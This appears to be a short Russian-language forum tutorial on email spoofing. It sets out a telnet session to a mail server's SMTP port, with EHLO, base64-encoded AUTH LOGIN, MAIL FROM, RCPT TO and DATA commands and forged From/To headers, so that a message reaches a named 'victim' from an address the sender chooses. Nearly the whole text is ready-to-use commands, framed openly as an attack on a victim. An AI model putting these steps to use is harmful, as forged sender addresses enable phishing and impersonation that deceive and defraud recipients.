Для использования уязвимости требуется знать ESMTP
протокол и иметь шифровальщик base64, например в unix-based ОС часто
встречается утилита base64. Ну, не забываем и про php-функцию.

Коннектимся на порт SMTP
telnet mail.server.ru 25

представляемся:
EHLO 123.123.123.123
- наш ip. он тоже не проверяется - можно писать любую ахинею.

AUTH LOGIN base64login
base64password

где base64login - ваш логин, закодированный в base64.
base64password - пароль в 64

далее:

MAIL FROM xaker@forum.ru
наш обратный адрес: xaker@forum.ru

RCPT TO: lamer@mail.ru
адрес жертвы: lamer@mail.ru

Далее:
DATA

после этого начинается тело письма
в теле письма пишется откуда оно пришло (повторно, кому предназначено,
в какой кодировке и т.д. и т.п.) Можно ограничиться From: и To:

To: <lamer@mail.ru>
From: < xaker@forum.ru>
Subject: hello, dude!

Где Subject - тема.

когда тело закончено пишем:
<RET>.<RET>

Жертве приходит письмо с адреса, который мы указали. А именно с xaker@forum.ru